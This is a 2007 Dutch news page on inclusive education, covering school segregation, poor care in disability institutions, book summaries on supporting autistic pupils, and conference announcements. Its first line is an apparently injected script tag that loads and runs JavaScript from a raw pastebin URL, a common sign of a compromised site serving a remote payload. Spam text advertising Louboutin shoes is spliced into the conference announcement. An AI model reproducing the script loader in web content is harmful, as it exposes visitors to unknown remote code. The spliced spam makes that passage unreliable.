<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws - 2007


Onderwijs apartheid neemt toe. alle reden om selectie op welke grond dan ook te verbieden. 19 november 2007
Kansarme en kansrijke kinderen gaan steeds vaker naar aparte basisscholen. Dit terwijl een gemengde klas soms beter is, zeggen sociologen. De segregatie op basisscholen is zo ver voortgeschreden dat onderzoek naar de resultaten van kansarme kinderen in gemengde klassen niet eens goed te doen is. Dat zeggen de onderwijssociologen Bowen Paulle (Universiteit van Amsterdam) en Paul Jungbluth (Universiteit Maastricht)in een artikel in Trouw 16 nov.. In een steekproef van een kleine 60.000 basisschoolleerlingen bleken slechts enkele tientallen kinderen van laagopgeleide ouders te zitten op een school met vooral kinderen uit hoog opgeleide milieus.
Klik hier voor meer informatie

3/4 van de instituten voor gehandicapten biedt slechte zorg 11 november 2007
het inspectierapport toont aan dat driekwart van de 24 uurs voorzieningen voor gehandicapten onder de maat zorg biedt. De helft is zelfs heel slecht en een kwart hiervan is ernstig slecht. Hierbij moet je denken aan het nog steeds vastbinden van mensen die met hun gedrag laten weten het ergens niet mee eens te zijn. De kleinere woonvoorzieningen doen het beter.
Moraal: probeer uit de instellingehn te blijven en bereidt jezelf voor op een leven in de maatschappij. Dit kan het beste door regulier onderwijs te volgen. Misschien dat jouw klasgenoten later 0ok jouw werkgevers en medewerkers worden. Meer geld naar de instituten is geen oplossing, dat wordt al jaren gedaan. de instituten afbreken en de zorg in de reguliere omgeving bieden zoals oa in Italie gebeurt. Daar zijn bijvoorbeeld bouwers en verbouwers verplicht alle huizen rolstoeltoegankelijk te maken. De staat is daar verplicht om alle maatregelen te treffen waardoor gehandicapten gewoon mee kunnen doen aan de maatschappij. (zoals hier elke bijziende een bril kan aanschaffen om zijn visuele handicap op te heffen.

leerlingen met lastig en/of autistisch gedrag in de inclusieve klas.-1- 12 oktober 2007
Op veler verzoek volgen hier samenvattingen van hoofdstukken uit het fantastastiche boek van Paula Kluth :You’re going to love this kid”. TEACHING STUDENTS with AUTISM in the INCLUSIVE CLASSROOM uitg Brooks. 2006. ISBN 1-55766-614-8

hoofdstuk 9A Gedrag Anders Bekeken. (rethinking behavior)

In het medisch model wordt gedrag vooral gezien als een eigenschap van de student zelf , alsof ze zich in een vacuum bevinden. Maar gedrag kan niet los gezien worden van het curriculum, instructie, onderwijs, leren, relaties, schoolcultuur,, etc. Daarnaast is de beoordeling van gedrag uiterst persoonlijk. Wat de ene leraar lastig vindt, bijv een erg energiek, rusteloos kind, kan de andere leraar heerlijk vinden (de gymleraar)
Mensen met autisme hebben het wat dat betreft moeilijk, als ze geen controle hebben over hun lijf. Hun gedrag geeft dan andere signalen dan wat ze zelf willen. De leraar kan bijvoorbeeld denken dat een student die zijn boeken niet pakt, lui is of ongehoorzaam. Als deze student echter planningsstoornissen of start problemen heeft dan kan zij die boeken helemaal niet pakken terwijl ze dat mischien wel wil!
VB2: een leerling gaat niet bij de deur staan als de leraar dat vraagt aan
de klas. Ongehoorzaam? tot de ouder desgevraagd zegt dat de leerling door angst bevangen is om van de ene klas naar de andere te gaan.

2 Stappen bij probleem gedrag:
Voordat gedrag gaat proberen te verklaren moet je eerst de volgende
vragen beantwoorden:
1 Maak het jezelf niet te moeilijk. Vraag je eerst af: is het gedrag wel een probleem?
Een leerling kijkt bijv de docent niet aan omdat zij zo beter kan luisteren.

Veel leerlingen met autisme hebben “ander” gedrag dat vragen stelt aan onze
normen. Professionals proberen vaak dat afwijkend gedrag te laten ophouden.
maar moet dat wel? kan je het misschien positief gebruiken? Voorbeeld:
Marcus is een excellente drummer. Hij herhaalt echter steeds de instructies
van de muziekleraar . Dit stoorde de nadere leerlingen niet maar wel de
muziekleraar.
Wat kan zijn strategie zijn?
de docent kan het negeren
de docent kan Marcus vragen een paar liedjes te introduceren
de docent kan iedereen vragen de opdrachten te herhalen
studenten kunnen proberen marcus zachter te laten praten door even op zijn
schouder te tikken.
Bedenk ook dat je als docent soms meer let op de "speciale"student omdat je
problemen verwacht , dan op de andere kinderen. ADHD kinderen moeten soms
langer stil kunnen zitten of stiller zijn dan andere leerlingen., omdat je meer focust op hem/haar.

2 De ecologische strategie.
Als er een probleem bestaat, waar treedt het op? wanneer treedt het op?

Verandering van de omgeving, curriculum, mogelijkheden tot sociale
interacties kunnen het probleem verhelpen.. Docenten kunnen bij elkaar gaan kijken, of uitwisselen welke strategien werken bij deze leerling.


Leerlingen met lastig en/of autistisch gedrag -2- 12 oktober 2007
Paula Kluth :You’re going to love this kid”. TEACHING STUDENTS with AUTISM in the INCLUSIVE CLASSROOM #hoofdstuk 9B

10 POSITIEVE STRATEGIEN OM LEERLINGEN MET LASTIG GEDRAG TE ONDERSTEUNEN.

1 vraag de leerling zelf naar de oorzaak van zijn probleemgedrag.
Zo wilde ryan niet douchen na het gymmen tot hij eindelijk met FC kon zeggen
dat hij alleen onder hele hete douches wou.
Is het gedrag moeilijk of makkelijk voor de leerling om te controleren? (soms wordt zij overspoeld door positieve of negatieve emoties
Soms heeft het gedrag een bepaalde bedoeling ( mukhopadhyay,2000: soms
moet ik tegen mijn hoofd slaan om het te voelen.)

2 Praat met de familie.
Ouders bieden gratis deskundige kennis aan
betreffende hun zoon/dochter.VB een lerling wilde nooit wat zeggen. Tot de
moeder desgevraaagd advies gaf aan de leraar om naar zijn hond te vragen.
Deze informatie was een soort sleutel waaarmee je zijn ziel kon openen. Vanaf die tijd begon hij entoesiast mee te doen.

3 Waardeer elke persoon van de school als potentiele helper.
Gino kon vreselijk van slag raken en huilde, gilde dan en liet zich vallen op de
grond en huilde. Niemand kon hem troosten. Jerry de concierge wilde zich
ermee bemoeien en wij probeerden hem weg te sturen. Dan begon Jerry in het
Italiaans te zingen en hielp Gino weer op zijn benen.
Medescholieren treden soms op als reddende enegelen in het voorkomen of laten ophouden van probleemgedrag.

4 focus op het vermijden van isolatie van de leerling door veel interactief werken of circles of friends planning.

5 wees medelevend in een krisis.
Je weet niet altijd wat een leerling nodig heeft . Probeer het hem/haar te vragen. Wil hij rust in een krisis? muziek? een arm om hem heen? Sommigen willen het liefst dat je even weggaat.
Misschien bijt hij je wel als je hem wil aanraken omdat hij niet ikan uitleggen dat hij alleen wil zijn. Blijf kalm en help de persoon zich te ontspannen.


De volgende handelingen zullen vrijwel zeker niet helpen:
-luide stem
-bestraffende woorden
spullen of leuke activiteiten afnemen
-fysieke redirection
-boosheid in toon of gedrag.

IN DEEL -3- VERDER.

3 november conferentie inclusief onderwijs met Jan Nisbett uit New Hampshire 10 oktober 2007
Stichting de Toekomst nodigt voor de derde cursus Partners in Policymaking Jan Nisbet van de Universiteit van New Hampshire uit naar Nederland te komen voor lezingen en Louboutin Schoenen workshops.
En u kunt hier kwaliteit christian louboutin schoenen kopen. Je zult ze leuk vinden.
De universiteit van New Hampshire is het epicentrum van het onderzoek rondom inclusief onderwijs. De zaterdag workshops staan open voor publiek.
Mis de gelegenheid niet om te luisteren naar de nieuwste inzichten, en te profiteren van de praktische kennis en handleidingen over inclusief lesgeven in basis en voortgezet onderwijs.
Toegangsprijs 55 euro (ev lunch 15 euro extra)
Locatie: conferentiecentrum Drakenburg te Baarn, www.drakenburg.nl
tijd 9.30-15.00
opgave:anne wibaut: wibatich@bart.nl tel 0703264546

12 oktober startsein coalitie voor inclusie in Huizen 28 september 2007
Voor een verslag zie: www.coalitievoorinclusie.nl.
Klik hier extra informatie

studiedagen index voor inclusie 15/10 6/11 19/11 13 september 2007
15 oktober, 6 november en 19 november organiseert Stichting Perspectief studiedagen over de Index voor Inclusie. Dit is een makkelijk instrument dat jouw school kan helpen een plek te worden waar iedereen zich welkom voelt. Voor ouders gratis.
Klik hier extra informatie
Klik hier voor meer informatie

Nederland ondertekent VN verdrag voor inclusief onderwijs 21 mei 2007
op 30 maart heeft nederland het VN verdrag ondertekent dat zegt te streven naar Inclusief Onderwijs voor alle kinderen met een handicap.

4-5-6 july, inclusief onderwijs conferentie in Montreal. 21 mei 2007
op 4-5-6 july vindt in Montreal een internationale conferentie plaats onder het motto "models for change" , van gewoon onderwijs naar Inclusief Onderwijs" Hoe bereiken we dat?
zie www.inclusiveeducation.ca

16-19 july praktijkscholing in New Brunswick Canada 21 mei 2007
wil je praktisch werken met Inclusief Onderwijs? : ga dan naar de praktijk gerichte scholingsdagen in New Brunswick op 16-17-18 en 19 july. new Brunswick is een Canadese staat met jarenlange ervaring in inclusief onderwijs, gedragen door leerkrachten ouders en beleidsmakers. Grijp je kans, zie www.inclusiveeducation.ca

VN verdrag regelt rechten van mensen met handicap 12 mei 2007
Nederland heeft vrijdag het VN-verdrag getekend voor de rechten van mensen met een handicap.

Dit nieuwe verdrag van de Verenigde Naties verplicht landen ertoe mensen met een handicap volwaardig te laten deelnemen aan de samenleving. Vijftig landen hebben hun akkoord al gegeven.

Staatssecretaris Bussemaker gaat alle Nederlandse wet- en regelgeving aan het verdrag toetsen. In het coalitieakkoord gaf het kabinet al aan dat het inzet op uitbreiding van de Wet gelijke behandeling op grond van handicap of chronische ziekte. Daarmee heeft het kabinet op zich genomen om het gedachtegoed uit het verdrag in deze wet te verankeren.

In het Europese Jaar van Gelijke Kansen voor Iedereen komt dit VN-verdrag als geroepen. Sociale en fysieke belemmeringen, waar mensen met een beperking dagelijks mee worden geconfronteerd, moeten weggenomen worden.
(bron: VWS)


CNN; autisme anders bekeken. 09 maart 2007
De CNN laat in haar link
http://www.cnn.com/2007/HEALTH/02/21/autism.amanda/index.html Amanda zien, een vrouw van 26 met het label zwaar geretardeerd omdat ze zo extreem autistisch gedrag vertoond. dankzij een communicatieapparaat kan ze zich uiten en ze blijkt extreem inteligent te zijn. Lees ook het commentaar van hersenchirurg Sanjay over haar.


kursus INCLUSIEF ONDERWIJS vanaf 27 maart 25 februari 2007
op 27 maart gaat een kursus van 5 avonden van start voor ouders en leerkrachten over Inclusief Onderwijs.Het nieuw regeerakkoord heet Samen werken Samen leven. Dit gaat natuurlijk beter als burgers dat op school leren. Het motto van Stichting Inclusief Onderwijs is: Waar kinderen samen leren, leren ze samen te leven. In de kursus van 5 dinsdagvonden vanaf 27 maart worden de belangrijkste aspecten behandeld.Plaats Laagte Kadijk 146 1018 ZD Amsterdam .Opgave grooff1@xs4all.nl
Klik hier voor meer informatie

regeerakkoord breidt speciaal onderwijs uit. 08 februari 2007
Het regeerakkoord heeft als titel : "samen werken, samen leven" . Mooie woorden maar ze haalt het meteen weer onderuit door "samen leren, samen leven" moeilijker te maken. Geen woord over het belang van de school om kinderen op te voeden tot burgers die elkaar respecteren en als vrienden op elkaars welzijn, veiligheid en spullen letten. Geen woord hoe je leerkrachten en docenten moet opleiden/bijscholen in klassemanagement en adaptief en uitdagend onderwijs, dat meteen ook het pestgedrag met 50% reduceert.Nee, meer geld voor speciaal onderwijs om wachtlijsten af te schaffen alsof daar het heil voor deze zorgkinderen is te verwachten. Volgens alle inspectierapporten niet en volgens de commissaris jeugd verlaat maar 5% het speciaal onderwijs met het zo noodzakelijk geachte diploma. Ook bij het kopje emancipatie (blz 30) worden gehandicapten niet genoemd terwijl toch iedereen weet dat ze nog lang niet dezelfde rechten hebben als andere burgers. Bijv het recht op onderwijs, het recht op een gezinsleven, het recht in publieke gebouwen te kunnen komen, het recht niet langer als untermensch gezien te worden.Nee, dit regeerakkoord laat een enorme kans liggen om juist gehandicapten te gebruiken om de maatschappij om te vormen tot een land waar sociale samenhang, respect voor elkaar, optimale arbeidsparticipatie en veiligheid centraal staan. Want een samenleving waarin ieder gerespecteerd wordt dwingt mensen niet tot marginaal gedrag.

95% leerlingen verlaat speciaal onderwijs zonder diploma 28 januari 2007
Commissaris jeugd en jongeren beleid, Stefan van Eijck, geeft het speciaal onderwijs een veeg uit de pan. meer dan 5% van de leerlingten verlaat het speciaal onderwijs zonder diploma. Het regulier onderwijs moet versterkt worden.
Kinderen met handicaps of specifiek problemen hebben extra aandacht nodig, liefst binnen het reguliere onderwijs. Gewoon op de school in de buurt. Nu stromen er nog onnodig kinderen uit naar het speciaal onderwijs. De zorg op de reguliere school moet beter. Reguliere scholen moeten hierover verantwoording afleggen. Ook moet aandacht binnen de Pabo voor het omgaan met leerlingen met gedragsproblemen verplicht worden.
zie www.operatiejong.nl